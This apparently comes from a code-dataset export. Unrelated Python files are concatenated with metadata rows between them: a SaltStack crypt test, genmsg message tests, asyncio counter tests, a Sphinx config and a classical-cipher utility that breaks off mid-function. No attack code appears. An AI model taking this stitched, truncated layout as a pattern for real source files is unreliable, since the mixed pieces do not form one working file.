@skipIf(not HAS_PYCRYPTO_RSA, 'pycrypto >= 2.6 is not available')
class CryptTestCase(TestCase):
    def test_gen_keys(self):
        with patch.multiple(os, umask=MagicMock(), chmod=MagicMock(), chown=MagicMock,
                            access=MagicMock(return_value=True)):
            with patch('salt.utils.files.fopen', mock_open()):
                open_priv_wb = call('/keydir/keyname.pem', 'wb+')
                open_pub_wb = call('/keydir/keyname.pub', 'wb+')
                with patch('os.path.isfile', return_value=True):
                    self.assertEqual(crypt.gen_keys('/keydir', 'keyname', 2048), '/keydir/keyname.pem')
                    self.assertNotIn(open_priv_wb, salt.utils.files.fopen.mock_calls)
                    self.assertNotIn(open_pub_wb, salt.utils.files.fopen.mock_calls)
                with patch('os.path.isfile', return_value=False):
                    with patch('salt.utils.files.fopen', mock_open()):
                        crypt.gen_keys('/keydir', 'keyname', 2048)
                        salt.utils.files.fopen.assert_has_calls([open_priv_wb, open_pub_wb], any_order=True)

    def test_sign_message(self):
        key = RSA.importKey(PRIVKEY_DATA)
        with patch('salt.crypt._get_rsa_key', return_value=key):
            self.assertEqual(SIG, salt.crypt.sign_message('/keydir/keyname.pem', MSG))

    def test_verify_signature(self):
        with patch('salt.utils.files.fopen', mock_open(read_data=PUBKEY_DATA)):
            self.assertTrue(crypt.verify_signature('/keydir/keyname.pub', MSG, SIG))
| 49.526316 | 108 | 0.732554 | 620 | 5,646 | 6.56129 | 0.504839 | 0.017699 | 0.02409 | 0.028024 | 0.106686 | 0.097837 | 0.083579 | 0.053097 | 0.026549 | 0.026549 | 0 | 0.10547 | 0.145236 | 5,646 | 113 | 109 | 49.964602 | 0.737464 | 0.017712 | 0 | 0.106383 | 0 | 0.031915 | 0.571403 | 0.514353 | 0 | 0 | 0 | 0 | 0.06383 | 1 | 0.031915 | false | 0 | 0.12766 | 0 | 0.170213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
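The test case above leans on `unittest.mock`'s `patch`/`mock_open` pair to keep `gen_keys` from touching the real filesystem. The same machinery works anywhere `open` is called; a minimal standalone demonstration (the `read_config` function and its path are invented for the example):

```python
from unittest.mock import patch, mock_open, call


def read_config(path):
    # code under test: reads a file it believes exists on disk
    with open(path) as f:
        return f.read().strip()


# patch the built-in open so no file is touched, mirroring the
# patch('salt.utils.files.fopen', ...) calls in the test case above
with patch("builtins.open", mock_open(read_data="keydir=/keydir\n")) as m:
    value = read_config("/etc/fake.conf")

# the mock records how it was used, just like fopen.mock_calls above
assert call("/etc/fake.conf") in m.mock_calls
```

Asserting on `mock_calls` after the fact is the same pattern `test_gen_keys` uses with `assertNotIn` and `assert_has_calls`.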
7d55cd544a02e7f8eda686f396f1e614dce7adb0 | 11,660 | py | Python | msg/tools/genmsg/test/test_genmsg_msgs.py | sikuner/Firmware_Marine | 80411dc4eb5aa9dc8eb3ca8ff6d59d1cf081a010 | [
"BSD-3-Clause"
] | 17 | 2020-03-13T00:10:28.000Z | 2021-09-06T17:13:17.000Z | msg/tools/genmsg/test/test_genmsg_msgs.py | sikuner/Firmware_Marine | 80411dc4eb5aa9dc8eb3ca8ff6d59d1cf081a010 | [
"BSD-3-Clause"
] | 1 | 2020-08-24T03:28:49.000Z | 2020-08-24T03:28:49.000Z | msg/tools/genmsg/test/test_genmsg_msgs.py | sikuner/Firmware_Marine | 80411dc4eb5aa9dc8eb3ca8ff6d59d1cf081a010 | [
"BSD-3-Clause"
] | 2 | 2020-03-13T09:05:32.000Z | 2021-08-13T08:28:14.000Z | # Software License Agreement (BSD License)
#
# Copyright (c) 2009, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import random
def test_bare_msg_type():
    import genmsg.msgs
    tests = [(None, None), ('String', 'String'), ('std_msgs/String', 'std_msgs/String'),
             ('String[10]', 'String'), ('string[10]', 'string'), ('std_msgs/String[10]', 'std_msgs/String'),
             ]
    for val, res in tests:
        assert res == genmsg.msgs.bare_msg_type(val)
PKG = 'genmsg'
def test_resolve_type():
    from genmsg.msgs import resolve_type, bare_msg_type
    for t in ['string', 'string[]', 'string[14]', 'int32', 'int32[]']:
        bt = bare_msg_type(t)
        assert t == resolve_type(t, PKG)

    assert 'foo/string' == resolve_type('foo/string', PKG)
    assert 'std_msgs/Header' == resolve_type('Header', 'roslib')
    assert 'std_msgs/Header' == resolve_type('std_msgs/Header', 'roslib')
    assert 'std_msgs/Header' == resolve_type('Header', 'stereo_msgs')
    assert 'std_msgs/String' == resolve_type('String', 'std_msgs')
    assert 'std_msgs/String' == resolve_type('std_msgs/String', 'std_msgs')
    assert 'std_msgs/String' == resolve_type('std_msgs/String', PKG)
    assert 'std_msgs/String[]' == resolve_type('std_msgs/String[]', PKG)
def test_parse_type():
    import genmsg.msgs
    tests = [
        ('a', ('a', False, None)),
        ('int8', ('int8', False, None)),
        ('std_msgs/String', ('std_msgs/String', False, None)),
        ('a[]', ('a', True, None)),
        ('int8[]', ('int8', True, None)),
        ('std_msgs/String[]', ('std_msgs/String', True, None)),
        ('a[1]', ('a', True, 1)),
        ('int8[1]', ('int8', True, 1)),
        ('std_msgs/String[1]', ('std_msgs/String', True, 1)),
        ('a[11]', ('a', True, 11)),
        ('int8[11]', ('int8', True, 11)),
        ('std_msgs/String[11]', ('std_msgs/String', True, 11)),
    ]
    for val, res in tests:
        assert res == genmsg.msgs.parse_type(val)

    fail = ['a[1][2]', 'a[][]', '', None, 'a[', 'a[[1]', 'a[1]]']
    for f in fail:
        try:
            genmsg.msgs.parse_type(f)
            assert False, "should have failed on %s" % f
        except ValueError as e:
            pass
def test_Constant():
    import genmsg.msgs
    vals = [random.randint(0, 1000) for i in range(0, 3)]
    type_, name, val = [str(x) for x in vals]
    x = genmsg.msgs.Constant(type_, name, val, str(val))

    assert type_ == x.type
    assert name == x.name
    assert val == x.val
    assert x == genmsg.msgs.Constant(type_, name, val, str(val))

    assert x != 1
    assert not x == 1
    assert x != genmsg.msgs.Constant('baz', name, val, str(val))
    assert x != genmsg.msgs.Constant(type_, 'foo', val, str(val))
    assert x != genmsg.msgs.Constant(type_, name, 'foo', 'foo')

    # tripwire
    assert repr(x)
    assert str(x)

    try:
        genmsg.msgs.Constant(None, name, val, str(val))
        assert False, "should have raised"
    except: pass
    try:
        genmsg.msgs.Constant(type_, None, val, str(val))
        assert False, "should have raised"
    except: pass
    try:
        genmsg.msgs.Constant(type_, name, None, 'None')
        assert False, "should have raised"
    except: pass
    try:
        genmsg.msgs.Constant(type_, name, val, None)
        assert False, "should have raised"
    except: pass

    try:
        x.foo = 'bar'
        assert False, 'Constant should not allow arbitrary attr assignment'
    except: pass
def test_MsgSpec():
def sub_test_MsgSpec(types, names, constants, text, full_name, has_header):
m = MsgSpec(types, names, constants, text, full_name)
assert m.types == types
assert m.names == names
assert m.text == text
assert has_header == m.has_header()
assert m.constants == constants
assert list(zip(types, names)) == m.fields()
assert m == MsgSpec(types, names, constants, text, full_name)
return m
from genmsg import MsgSpec, InvalidMsgSpec
from genmsg.msgs import Field
# don't allow duplicate fields
try:
MsgSpec(['int32', 'int64'], ['x', 'x'], [], 'int32 x\nint64 x', 'x/DupFields')
assert False, "should have raised"
except InvalidMsgSpec:
pass
# don't allow invalid fields
try:
MsgSpec(['string['], ['x'], [], 'int32 x\nint64 x', 'x/InvalidFields')
assert False, "should have raised"
except InvalidMsgSpec:
pass
# allow empty msg
empty = sub_test_MsgSpec([], [], [], '', 'x/Nothing', False)
assert [] == empty.fields()
assert [] == empty.parsed_fields()
assert 'x/Nothing' == empty.full_name
assert 'x' == empty.package
assert 'Nothing' == empty.short_name
# one-field
one_field = sub_test_MsgSpec(['int32'], ['x'], [], 'int32 x', 'x/OneInt', False)
# make sure that equals tests every declared field
assert one_field == MsgSpec(['int32'], ['x'], [], 'int32 x', 'x/OneInt')
assert one_field != MsgSpec(['uint32'], ['x'], [], 'int32 x', 'x/OneInt')
assert one_field != MsgSpec(['int32'], ['y'], [], 'int32 x', 'x/OneInt')
assert one_field != MsgSpec(['int32'], ['x'], [], 'uint32 x', 'x/OneInt')
assert one_field != MsgSpec(['int32'], ['x'], [], 'int32 x', 'x/OneIntBad')
# test against __ne__ as well
assert one_field != MsgSpec(['int32'], ['x'], [], 'uint32 x', 'x/OneInt')
assert [Field('x', 'int32')] == one_field.parsed_fields(), "%s vs %s"%([Field('x', 'int32')], one_field.parsed_fields())
#test str
assert "int32 x" == str(one_field).strip()
# test variations of multiple fields and headers
two_fields = sub_test_MsgSpec(['int32', 'string'], ['x', 'str'], [], 'int32 x\nstring str', 'x/TwoFields', False)
assert [Field('x', 'int32'), Field('str', 'string')] == two_fields.parsed_fields()
one_header = sub_test_MsgSpec(['std_msgs/Header'], ['header'], [], 'Header header', 'x/OneHeader', True)
header_and_fields = sub_test_MsgSpec(['std_msgs/Header', 'int32', 'string'], ['header', 'x', 'str'], [], 'Header header\nint32 x\nstring str', 'x/HeaderAndFields', True)
embed_types = sub_test_MsgSpec(['std_msgs/Header', 'std_msgs/Int32', 'string'], ['header', 'x', 'str'], [], 'Header header\nstd_msgs/Int32 x\nstring str', 'x/EmbedTypes', True)
#test strify
assert "int32 x\nstring str" == str(two_fields).strip()
# types and names mismatch
try:
MsgSpec(['int32', 'int32'], ['intval'], [], 'int32 intval\nint32 y', 'x/Mismatch')
assert False, "types and names must align"
except InvalidMsgSpec: pass
# test (not) equals against non msgspec
assert not (one_field == 1)
assert one_field != 1
# test constants
from genmsg.msgs import Constant
msgspec = MsgSpec(['int32'], ['x'], [Constant('int8', 'c', 1, '1')], 'int8 c=1\nuint32 x', 'x/Constants')
assert msgspec.constants == [Constant('int8', 'c', 1, '1')]
# tripwire
str(msgspec)
repr(msgspec)
# test that repr doesn't throw an error
[repr(x) for x in [empty, one_field, one_header, two_fields, embed_types]]
def test_Field():
from genmsg.msgs import Field
field = Field('foo', 'string')
assert field == Field('foo', 'string')
assert field != Field('bar', 'string')
assert field != Field('foo', 'int32')
assert field != 1
assert not field == 1
assert field.name == 'foo'
assert field.type == 'string'
assert field.base_type == 'string'
assert field.is_array == False
assert field.array_len == None
assert field.is_header == False
assert field.is_builtin == True
field = Field('foo', 'std_msgs/String')
assert field.type == 'std_msgs/String'
assert field.base_type == 'std_msgs/String'
assert field.is_array == False
assert field.array_len == None
assert field.is_header == False
assert field.is_builtin == False
field = Field('foo', 'std_msgs/String[5]')
assert field.type == 'std_msgs/String[5]'
assert field.base_type == 'std_msgs/String'
assert field.is_array == True
assert field.array_len == 5
assert field.is_header == False
assert field.is_builtin == False
field = Field('foo', 'std_msgs/String[]')
assert field.type == 'std_msgs/String[]'
assert field.base_type == 'std_msgs/String'
assert field.is_array == True
assert field.array_len == None
assert field.is_header == False
assert field.is_builtin == False
field = Field('foo', 'std_msgs/Header')
assert field.type == 'std_msgs/Header'
assert field.is_header == True
assert field.is_builtin == False
field = Field('foo', 'std_msgs/Header[]')
assert field.type == 'std_msgs/Header[]'
assert field.is_header == False
#tripwire
repr(field)
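The base_type / is_array / array_len behaviour asserted above can be sketched with a single regular expression; this is an illustration of the contract, not genmsg's actual parser:

```python
import re

def parse_type(t):
    """Split 'Pkg/Type[N]' into (base_type, is_array, array_len)."""
    m = re.match(r'^(.+?)(\[(\d*)\])?$', t)
    base, bracket, num = m.group(1), m.group(2), m.group(3)
    if not bracket:
        return base, False, None
    return base, True, int(num) if num else None

print(parse_type('std_msgs/String[5]'))  # prints ('std_msgs/String', True, 5)
print(parse_type('std_msgs/String[]'))   # prints ('std_msgs/String', True, None)
print(parse_type('int32'))               # prints ('int32', False, None)
```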
def test_is_valid_msg_type():
import genmsg.msgs
vals = [
#basic
'F', 'f', 'Foo', 'Foo1',
'std_msgs/String',
# arrays
'Foo[]', 'Foo[1]', 'Foo[10]',
]
for v in vals:
assert genmsg.msgs.is_valid_msg_type(v), "genmsg.msgs.is_valid_msg_type should have returned True for '%s'"%v
# bad cases
vals = [None, '', '#', '%', 'Foo%', 'Woo Woo',
'/', '/String',
'Foo[f]', 'Foo[1d]', 'Foo[-1]', 'Foo[1:10]', 'Foo[', 'Foo]', 'Foo[]Bar']
for v in vals:
assert not genmsg.msgs.is_valid_msg_type(v), "genmsg.msgs.is_valid_msg_type should have returned False for '%s'"%v
def test_is_valid_constant_type():
import genmsg.msgs
valid = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', \
'uint64', 'float32', 'float64', 'char', 'byte', 'string']
invalid = [
'std_msgs/String', '/', 'String',
'time', 'duration','header',
]
for v in valid:
assert genmsg.msgs.is_valid_constant_type(v), "genmsg.msgs.is_valid_constant_type should have returned True for '%s'"%v
for v in invalid:
assert not genmsg.msgs.is_valid_constant_type(v), "genmsg.msgs.is_valid_constant_type should have returned False for '%s'"%v
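The repeated try/`assert False`/except pattern used throughout these tests can be factored into a small context manager; a standalone sketch, independent of genmsg, using `int()` purely as a stand-in:

```python
from contextlib import contextmanager

@contextmanager
def assert_raises(exc_type):
    """Fail unless the wrapped block raises exc_type."""
    try:
        yield
    except exc_type:
        return  # the expected exception was raised; suppress it
    raise AssertionError("%s was not raised" % exc_type.__name__)

# Example: int() rejects non-numeric strings with ValueError.
with assert_raises(ValueError):
    int("not a number")
```

Unlike a bare `except: pass`, the context manager cannot accidentally swallow the failure signal itself.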
| 38.996656 | 180 | 0.620583 | 1,567 | 11,660 | 4.495852 | 0.178685 | 0.043719 | 0.055358 | 0.021718 | 0.473243 | 0.421718 | 0.394322 | 0.340099 | 0.295387 | 0.247693 | 0 | 0.019167 | 0.225901 | 11,660 | 298 | 181 | 39.127517 | 0.761356 | 0.165523 | 0 | 0.274882 | 0 | 0 | 0.235896 | 0.015292 | 0 | 0 | 0 | 0 | 0.445498 | 1 | 0.042654 | false | 0.042654 | 0.061611 | 0 | 0.109005 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d56e588d7a6fdb0c64b6925b9b5823ebec11f36 | 4,547 | py | Python | tests/tests.py | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | [
"MIT"
] | null | null | null | tests/tests.py | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | [
"MIT"
] | null | null | null | tests/tests.py | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | [
"MIT"
] | null | null | null | import unittest
from asyncio import sleep
from async_unittest import TestCase
from aio_counter import AioCounter
from aio_counter.exceptions import AioCounterException
class TestAioCounter(TestCase):
TIK = float(0.3)
TAK = float(0.6)
TTL = int(1)
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.counter = AioCounter(loop=cls.loop)
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
cls.counter.close()
def setUp(self) -> None:
self.counter._count = 0
self.counter._incs.clear()
self.counter._decs.clear()
# close all handlers
self.counter.close()
self.counter._handlers.clear()
def tearDown(self) -> None:
self.counter.close()
async def test_dec(self):
assert self.counter.empty()
self.counter._loop.call_later(self.TIK, self.counter.inc_nowait)
assert self.counter.count == 0
# wait until delayed inc_nowait increment counter
count = await self.counter.dec()
assert count == 0
async def test_inc(self):
assert self.counter.empty()
# fill counter
self.counter._count = self.counter.max_count
assert self.counter.count == self.counter.max_count
self.counter._loop.call_later(self.TIK, self.counter.dec_nowait)
assert self.counter.count == self.counter.max_count
# wait until delayed dec_nowait decrement counter
count = await self.counter.inc()
assert count == self.counter.max_count
def test_dec_nowait(self):
assert self.counter.empty()
try:
self.counter.dec_nowait()
except AioCounterException as e:
assert e
else:
assert False
count = self.counter.inc_nowait()
assert count == 1
assert self.counter.count == 1
count = self.counter.dec_nowait()
assert count == 0
assert self.counter.count == 0
def test_inc_nowait(self):
assert self.counter.empty()
count = self.counter.inc_nowait()
assert count == 1
assert self.counter.count == 1
# fill counter
self.counter._count = self.counter.max_count
try:
self.counter.inc_nowait()
except AioCounterException as e:
assert e
else:
assert False
async def test_ttl_inc(self):
assert self.counter.empty()
# inc with ttl = TTL
await self.counter.inc(self.TTL)
assert self.counter.count == 1
# sleep and inc() should run in one loop
await sleep(self.TTL, loop=self.loop)
# check if count was dec
assert self.counter.count == 0
async def test_bulk_inc(self):
"""
inc() with value > 1 should success only if counter changed to <value > 1> in one moment
:return:
"""
assert self.counter.empty()
# fill counter
self.counter._count = self.counter.max_count - 1
assert self.counter.count == self.counter.max_count - 1
def delayed_check(counter):
assert counter.count == counter.max_count - 1
self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
self.counter._loop.call_later(self.TTL, self.counter.dec_nowait)
assert self.counter.count == self.counter.max_count - 1
await self.counter.inc(value=2)
assert self.counter.count == self.counter.max_count
async def test_bulk_dec(self):
"""
dec() with value > 1 should success only if counter changed to <value > 1> in one moment
:return:
"""
assert self.counter.empty()
await self.counter.inc()
assert self.counter.count == 1
def delayed_check(counter):
assert counter.count == 1
self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
self.counter._loop.call_later(self.TTL, self.counter.inc_nowait)
assert self.counter.count == 1
await self.counter.dec(value=2)
assert self.counter.empty()
async def test_ttl_after_dec(self):
assert self.counter.empty()
await self.counter.inc(self.TTL)
assert self.counter.count == 1
count = self.counter.dec_nowait()
assert count == 0
assert self.counter.count == 0
await sleep(self.TTL, loop=self.loop)
if __name__ == '__main__':
unittest.main()
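The blocking behaviour exercised by `test_dec` (a `dec()` call that waits until a later `inc()` lands) can be sketched with a bare `asyncio.Condition`; this is a standalone toy, not the real `AioCounter` API:

```python
import asyncio

class TinyCounter:
    """Minimal counter: dec() blocks until the count is positive."""
    def __init__(self):
        self._count = 0
        self._cond = asyncio.Condition()

    async def inc(self):
        async with self._cond:
            self._count += 1
            self._cond.notify()

    async def dec(self):
        async with self._cond:
            await self._cond.wait_for(lambda: self._count > 0)
            self._count -= 1
            return self._count

async def _delayed_inc(counter):
    await asyncio.sleep(0.05)
    await counter.inc()

async def main():
    counter = TinyCounter()
    asyncio.ensure_future(_delayed_inc(counter))
    return await counter.dec()  # waits for the delayed inc(), then returns 0

print(asyncio.run(main()))  # prints 0
```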
| 25.544944 | 96 | 0.61667 | 569 | 4,547 | 4.803163 | 0.147627 | 0.269667 | 0.149287 | 0.120746 | 0.69667 | 0.615441 | 0.565679 | 0.544457 | 0.4764 | 0.387486 | 0 | 0.009861 | 0.286343 | 4,547 | 177 | 97 | 25.689266 | 0.832357 | 0.051463 | 0 | 0.553398 | 0 | 0 | 0.001978 | 0 | 0 | 0 | 0 | 0 | 0.349515 | 1 | 0.07767 | false | 0 | 0.048544 | 0 | 0.165049 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d68c3cd5ebdfbe4a4f33c56583ea1d144745710 | 915 | py | Python | chess/pythonchess/docs/conf.py | mahakbansal/ChessAlphaZero | 2b3f823fdc252d7fd32de0b5e4e53aece9082dd5 | [
"MIT"
] | 2 | 2021-02-22T21:53:58.000Z | 2021-04-03T16:40:52.000Z | chess/pythonchess/docs/conf.py | mahakbansal/ChessAlphaZero | 2b3f823fdc252d7fd32de0b5e4e53aece9082dd5 | [
"MIT"
] | 1 | 2018-09-26T03:38:57.000Z | 2018-09-26T03:38:57.000Z | chess/pythonchess/docs/conf.py | mahakbansal/ChessAlphaZero | 2b3f823fdc252d7fd32de0b5e4e53aece9082dd5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
import os
# Import the chess module.
sys.path.insert(0, os.path.abspath('..'))
import chess
# Autodoc.
extensions = ["sphinx.ext.autodoc"]
autodoc_member_order = 'bysource'
# The suffix of source filenames.
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "python-chess"
copyright = "2014–2018, Niklas Fiekas"
# The version.
version = chess.__version__
release = chess.__version__
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "default"
| 22.875 | 74 | 0.747541 | 128 | 915 | 5.1875 | 0.617188 | 0.036145 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012953 | 0.156284 | 915 | 39 | 75 | 23.461538 | 0.845855 | 0.491803 | 0 | 0 | 0 | 0 | 0.20354 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d8c2a23670b05afd3505faf37ad0aff75f308fd | 5,073 | py | Python | vcommand/libs/crypto.py | virink/vCommand | 328dd5a8bc9390c5edde80f5544d797f54690f91 | [
"MIT"
] | 7 | 2019-08-01T14:57:34.000Z | 2019-11-26T12:12:17.000Z | vcommand/libs/crypto.py | virink/vCommand | 328dd5a8bc9390c5edde80f5544d797f54690f91 | [
"MIT"
] | null | null | null | vcommand/libs/crypto.py | virink/vCommand | 328dd5a8bc9390c5edde80f5544d797f54690f91 | [
"MIT"
] | 2 | 2019-08-16T04:52:50.000Z | 2019-11-26T12:12:25.000Z | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
Author : Virink <virink@outlook.com>
Date : 2019/04/18, 14:49
"""
import string
import re
L = string.ascii_lowercase
U = string.ascii_uppercase
A = string.ascii_letters
def func_atbash(*args):
"""埃特巴什码解码"""
arg = args[0]
arg = arg.lower().replace(' ', 'vvvzzzvvv')
res = [L[25 - j] for i in arg for j in range(26) if i == L[j]]
return ''.join(res).replace('eeeaaaeee', ' ')
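The sentinel-string trick above can be avoided entirely with `str.maketrans`, which leaves unmapped characters such as spaces untouched; a standalone sketch:

```python
import string

_L = string.ascii_lowercase
_ATBASH = str.maketrans(_L, _L[::-1])

def atbash(text):
    """Map a..z onto z..a; other characters pass through unchanged."""
    return text.lower().translate(_ATBASH)

print(atbash('attack at dawn'))  # prints zggzxp zg wzdm
```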
def __caesar(offset, arg):
"""Caesar cipher: internal helper."""
result = ""
for ch in arg:
if ch.isupper():
result += U[((U.index(ch) + offset) % 26)]
elif ch.islower():
result += L[((L.index(ch) + offset) % 26)]
else:
result += ch
return result
def func_caesar(*args):
"""Caesar cipher (brute-force all 26 offsets)."""
res = []
for offset in range(26):
res.append("[+] offset : %d\tresult : %s" %
(offset, __caesar(offset, args[0])))
return "\r\n".join(res)
def func_rot13(*args):
"""rot13"""
return __caesar(13, args[0])
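ROT13 is its own inverse, and the standard library already ships it as a codec, which makes a quick standalone sanity check easy:

```python
import codecs

msg = 'Why did the chicken cross the road?'
enc = codecs.encode(msg, 'rot_13')
print(enc)                                  # prints Jul qvq gur puvpxra pebff gur ebnq?
assert codecs.encode(enc, 'rot_13') == msg  # applying ROT13 twice is a no-op
```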
def func_mpkc(*args):
"""Mobile phone keyboard cipher."""
T = {
'A': 21, 'B': 22, 'C': 23, 'D': 31, 'E': 32, 'F': 33,
'G': 41, 'H': 42, 'I': 43, 'J': 51, 'K': 52, 'L': 53,
'M': 61, 'N': 62, 'O': 63, 'P': 71, 'Q': 72, 'R': 73, 'S': 74,
'T': 81, 'U': 82, 'V': 83, 'W': 91, 'X': 92, 'Y': 93, 'Z': 94
}
arg = args[0].upper()
if arg[0] in U:
return ','.join([str(T.get(i, i)) for i in arg])
else:
T = {str(T[k]): k for k in T}
if ',' in arg:
arg = arg.split(',')
elif ' ' in arg:
arg = arg.split(' ')
return ''.join([T.get(i, i) for i in arg])
def func_morse(*args):
"""Morse code."""
T = {
'A': '.-', 'B': '-...', 'C': '-.-.',
'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..',
'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---',
'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-',
'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..',
'0': '-----', '1': '.----', '2': '..---',
'3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..',
'9': '----.',
',': '--..--', '.': '.-.-.-', ':': '---...', ';': '-.-.-.',
'?': '..--..', '=': '-...-', "'": '.----.', '/': '-..-.',
'!': '-.-.--', '-': '-....-', '_': '..--.-', '(': '-.--.',
')': '-.--.-', '$': '...-..-', '&': '.-...', '@': '.--.-.',
'{': '----.--', '}': '-----.-'
}
arg = args[0]
if re.match(r'^[\.\-\/ ]+$', arg):
T = {str(T[k]): k for k in T}
if len(args) > 1:
arg = ' '.join(args)
arg = arg.replace('/', ' ').split()
# TODO: morse auto decode when it is not sep
# p = 0
# res = ''
# d = 5
# while p < (len(arg)+7) and d > 0:
# print("[D] len : %d p : %d" % (len(arg), p))
# for j in [6, 5, 4, 3, 2, 1, 0]:
# tmp = T.get(arg[p:p+j], None)
# print("[D] tmp = arg[%d:%s] = %s => %s" %
# (p, j, arg[p:p+j], tmp))
# if tmp:
# p = p+j
# res += tmp
# break
# # p = p+j-1
# # break
# d -= 1
# print("[D] Result : %s" % res)
return ''.join([T.get(i, '?') for i in arg])
else:
return '/'.join([str(T.get(i, '?')) for i in arg.upper()])
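The encode/decode contract implemented above (letters joined by `/`, decoding keyed on the inverted table) round-trips; a standalone sketch over a deliberately tiny three-letter table:

```python
# Toy Morse table; the real function above covers A-Z, digits and punctuation.
TABLE = {'S': '...', 'O': '---', 'E': '.'}
INVERSE = {v: k for k, v in TABLE.items()}

def encode(text):
    return '/'.join(TABLE[c] for c in text.upper())

def decode(code):
    return ''.join(INVERSE[sym] for sym in code.split('/'))

print(encode('sos'))                    # prints .../---/...
assert decode(encode('sos')) == 'SOS'   # round-trip recovers the plaintext
```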
def func_peigen(*args):
"""Bacon cipher."""
T = {
'H': 'aabbb', 'G': 'aabba', 'R': 'baaab', 'Q': 'baaaa',
'Z': 'bbaab', 'Y': 'bbaaa', 'N': 'abbab', 'M': 'abbaa',
'U': 'babaa', 'V': 'babab', 'I': 'abaaa', 'J': 'abaab',
'F': 'aabab', 'E': 'aabaa', 'A': 'aaaaa', 'B': 'aaaab',
'T': 'baabb', 'S': 'baaba', 'C': 'aaaba', 'D': 'aaabb',
'P': 'abbbb', 'O': 'abbba', 'K': 'ababa', 'L': 'ababb',
'W': 'babba', 'X': 'babbb'
}
arg = args[0]
if re.match(r'^[ab]+$', arg):
T = {str(T[k]): k for k in T}
return ''.join([T.get(arg[i:i+5]) for i in range(0, len(arg), 5)])
else:
return ''.join([T.get(i.upper()) for i in arg])
def __vigenere(s, key='virink', de=0):
"""Vigenère cipher."""
s = str(s).replace(" ", "").upper()
key = str(key).replace(" ", "").upper()
res = ''
i = 0
while i < len(s):
j = i % len(key)
k = U.index(key[j])
m = U.index(s[i])
if de:
if m < k:
m += 26
res += U[m - k]
else:
res += U[(m + k) % 26]
i += 1
return res
def func_vigenere(*args):
"""Vigenère cipher."""
if len(args) < 2:
return '[-] Vigenere Usage : command key text [isdecode]'
return __vigenere(args[1], args[0], 1 if len(args) >= 3 else 0)
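A standalone round-trip check of the Vigenère logic (uppercase-only, spaces stripped, mirroring `__vigenere`), using the classic LEMON example:

```python
import string

U = string.ascii_uppercase

def vigenere(s, key, decode=False):
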